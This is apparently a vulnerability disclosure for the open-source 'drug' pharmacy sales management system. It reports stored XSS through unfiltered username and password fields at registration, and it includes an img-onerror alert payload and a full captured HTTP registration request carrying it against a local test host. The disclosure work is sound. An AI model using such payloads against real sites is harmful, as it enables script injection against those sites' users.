Project Introduction
drug is a pharmacy sales management system , Project address:https://github.com/deathbreak/drug
Vulnerability Analysis
\\drug\\src\\main\\java\\com\\controller\\ClerkController.java
path \\drug\\src\\main\\java\\com\\bean\\Manager.java
,Click to follow up "Manager" class ,The "user" and "password" parameters are not filtered and statements can be constructed to perform XSS attacks
After setting up the test website locally, visit the system registration page,"username" and "password" Parameters have vulnerabilities,"user" or "password" Parameters input payload :"><img src=1 onerror=alert(/xss/)>
Register as a user
Data Pack
POST /drug/register_user HTTP/1.1
Host: 192.168.152.185:8080
Cache-Control: max-age=0
Origin: <http://192.168.152.185:8080>
Referer: <http://192.168.152.185:8080/drug/register>
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Cookie: JSESSIONID=265273BF778DCA81E538DFEA75D7878C
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 82
user=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&password=123456&role=0